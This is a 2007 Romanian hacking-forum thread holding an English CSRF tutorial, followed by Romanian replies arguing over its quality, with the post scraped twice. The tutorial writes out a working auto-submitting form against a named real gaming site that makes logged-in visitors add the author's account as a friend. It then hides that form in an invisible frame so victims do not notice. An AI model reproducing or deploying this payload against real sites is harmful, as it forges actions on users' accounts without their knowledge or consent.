CSRF (Cross Site Request Forgery) tutorial

moubik · 11-17-2007, 02:52 PM

A simple CSRF tutorial

Cross Site Request Forgery. What does it actually mean?
First let's check a site out:
[Doar userii inregistrati pot vedea linkurile. ]

Create an account.
I've created an account named "websecurity.ro". Login and select Autologin
Login and select autologin
What does autologin mean ? It means that it saves the cookie and every time i'll enter that page i will be automatically logged (this is very important in CSRF)

Let's see for example how i can add a friend:
[Doar userii inregistrati pot vedea linkurile. ]
Nice, i can add myself as a friend
I’ve added myself as a friend

Let's see how the addfriend form looks like (I'll use webdeveloper plugin from firefox):

<form action="admin/friends.php" method="post">
<input name="sql" value="a_f" type="hidden" />
<input name="f_name" style="width: 150px" type="text" />
<input value="Add user to my friends list" type="submit" />
</form>

from this code we can create this auto submitting html:

<form action="http://sc.gosugamers.net/admin/friends.php" method="post" name="dude">
<input name="sql" value="a_f" type="hidden" />
<input name="f_name" style="width: 150px" type="text" value="websecurity.ro" />
<input value="Add user to my friends list" type="submit" />
</form>
<script>
setTimeout("document.dude.submit()", 2000);
</script>

We can save this code as gosugamers_csrf.html
Anyone who is already logged in sc.gosugamers.net and enters gosugamers_csrf.html will automatically add "websecurity.ro" as their friend.

PoC: gosugamers_csrf.html

This is one of the most harmless CSRF that you can create on their website.

I don't really like how this piece of code gets executed, because the user can see that the request has been made and can undo it immediately.

Let's create another html:

<html>
<head></head>
<frameset rows="100%,0%">
<frame src="somecoolpage.html">
<frame src="gosugamers_csrf.html" name="littleframes">
</frameset>
</html>

And save it as gosugamers_hidden_csrf.html

This one loads 2 pages:
- somecoolpage.html that will blind the user who enters the page;
- gosugamers_csrf.html that will be almost invisible for the user.

The final CSRF PoC:
gosugamers_hidden_csrf.html

original article on [Doar userii inregistrati pot vedea linkurile. ]
[Doar userii inregistrati pot vedea linkurile. ]

tw8 · 11-17-2007, 03:32 PM

Sincer sa fiu, mi se pare cam slabut. Nu prea ai explicat codul, si celor care nu stiu deja cate ceva despre CSRF si ceva HTML, nu prea le e de folos, iar celor care stiu, nu le e de folos deloc. Cred ca trebuia sa explici putin mai bine.
In rest, toate bune

.
Bafta :P!

moubik · 11-17-2007, 03:55 PM

nu e explicat pt bunica ta. accepta si taci.

tw8 · 11-17-2007, 04:17 PM

De acum o sa tin minte. Cand o sa faci tu un tutorial, o sa zic, indiferent de cat e de bun (sau de prost :P), ca mi-a placut foarte mult, pentru ca vad ca sinceritatea te enerveaza

.

Bafta :P!

moubik · 11-17-2007, 04:22 PM

grow up.
vrei sa pun requirements pentru a citi acest tutorial ?

tw8 · 11-17-2007, 04:24 PM

Quote:

Originally Posted by moubik

grow up.

Nu eu sunt cel care nu accepta parerea celorlalti. De fiecare data cand am facut un tutorial, am primit si laude, si critici. Insa, de fiecare data am primit critici diferite, nu am primit de 2 ori aceleasi comentarii, pentru ca eu tin cont de sfaturile celorlalti.
P.S.: Daca vrei sa ne mai "certam" in idei, te astept pe PM, ca sa nu facem offtopic

.

moubik · 11-17-2007, 04:30 PM

m-ai invatat o lectie de viata. acum ma simt implinit.
esti cumva pustan ? ca te simti important vad

tw8 · 11-17-2007, 04:38 PM

Quote:

Originally Posted by moubik

ca te simti important vad

Ce te face sa crezi asta ?

d3v1l · 11-18-2007, 12:16 AM

Quote:

Originally Posted by moubik

esti cumva pustan ? ca te simti important vad

suntetzi amandoi "pustani" pt ca daca atzi fi baietzi maturi nu vatzi certa pt nimicuri. btw..

Parerea mea?Nu vad rostul unui tutorial facut in "english" si post-at aici intr-un forum romanesc(avand in vedere ca nu prea exista reg externi, iar prea putini care sunt intra aici doar pt "tools" si "exploit-uri" nicidecum pt tutoriale!

Mai mult? -De ce drecu postati raspunsuri in limba romana din moment ce acest thread e doar pt "Tutoriale in engleza" Sau sa inteleg ca sunt "tutoriale in engleza"pt romani ?

11-17-2007, 02:52 PM	#1 (permalink)
moubik Administrator Cultul betivilor Join Date: Aug 2007 Posts: 1,246 Rep Power: 10	CSRF (Cross Site Request Forgery) tutorial hotel regim hotelier hotel yahoo domain A simple CSRF tutorial Cross Site Request Forgery. What does it actually mean? First let's check a site out: [Doar userii inregistrati pot vedea linkurile. ] Create an account. I've created an account named "websecurity.ro". Login and select Autologin Login and select autologin What does autologin mean ? It means that it saves the cookie and every time i'll enter that page i will be automatically logged (this is very important in CSRF) Let's see for example how i can add a friend: [Doar userii inregistrati pot vedea linkurile. ] Nice, i can add myself as a friend I’ve added myself as a friend Let's see how the addfriend form looks like (I'll use webdeveloper plugin from firefox): <form action="admin/friends.php" method="post"> <input name="sql" value="a_f" type="hidden" /> <input name="f_name" style="width: 150px" type="text" /> <input value="Add user to my friends list" type="submit" /> </form> from this code we can create this auto submitting html: <form action="http://sc.gosugamers.net/admin/friends.php" method="post" name="dude"> <input name="sql" value="a_f" type="hidden" /> <input name="f_name" style="width: 150px" type="text" value="websecurity.ro" /> <input value="Add user to my friends list" type="submit" /> </form> <script> setTimeout("document.dude.submit()", 2000); </script> We can save this code as gosugamers_csrf.html Anyone who is already logged in sc.gosugamers.net and enters gosugamers_csrf.html will automatically add "websecurity.ro" as their friend. PoC: gosugamers_csrf.html This is one of the most harmless CSRF that you can create on their website. I don't really like how this piece of code gets executed, because the user can see that the request has been made and can undo it immediately. Let's create another html: <html> <head></head> <frameset rows="100%,0%"> <frame src="somecoolpage.html"> <frame src="gosugamers_csrf.html" name="littleframes"> </frameset> </html> And save it as gosugamers_hidden_csrf.html This one loads 2 pages: - somecoolpage.html that will blind the user who enters the page; - gosugamers_csrf.html that will be almost invisible for the user. The final CSRF PoC: gosugamers_hidden_csrf.html original article on [Doar userii inregistrati pot vedea linkurile. ] [Doar userii inregistrati pot vedea linkurile. ] __________________ you wouldn't like me when i'm angry.

11-17-2007, 03:32 PM	#2 (permalink)
tw8 Registered Users Bautor de whiskey Join Date: Jun 2006 Location: Drobeta Turnu Severin Posts: 490 Rep Power: 5	Sincer sa fiu, mi se pare cam slabut. Nu prea ai explicat codul, si celor care nu stiu deja cate ceva despre CSRF si ceva HTML, nu prea le e de folos, iar celor care stiu, nu le e de folos deloc. Cred ca trebuia sa explici putin mai bine. In rest, toate bune . Bafta :P! __________________ Exista 10 feluri de oameni: cei care inteleg sistemul binar si cei care nu il inteleg.

11-17-2007, 03:55 PM	#3 (permalink)
moubik Administrator Cultul betivilor Join Date: Aug 2007 Posts: 1,246 Rep Power: 10	nu e explicat pt bunica ta. accepta si taci. __________________ you wouldn't like me when i'm angry.

11-17-2007, 04:17 PM	#4 (permalink)
tw8 Registered Users Bautor de whiskey Join Date: Jun 2006 Location: Drobeta Turnu Severin Posts: 490 Rep Power: 5	De acum o sa tin minte. Cand o sa faci tu un tutorial, o sa zic, indiferent de cat e de bun (sau de prost :P), ca mi-a placut foarte mult, pentru ca vad ca sinceritatea te enerveaza . Bafta :P! __________________ Exista 10 feluri de oameni: cei care inteleg sistemul binar si cei care nu il inteleg.

11-17-2007, 04:22 PM	#5 (permalink)
moubik Administrator Cultul betivilor Join Date: Aug 2007 Posts: 1,246 Rep Power: 10	grow up. vrei sa pun requirements pentru a citi acest tutorial ? __________________ you wouldn't like me when i'm angry.

11-17-2007, 04:30 PM	#7 (permalink)
moubik Administrator Cultul betivilor Join Date: Aug 2007 Posts: 1,246 Rep Power: 10	m-ai invatat o lectie de viata. acum ma simt implinit. esti cumva pustan ? ca te simti important vad __________________ you wouldn't like me when i'm angry.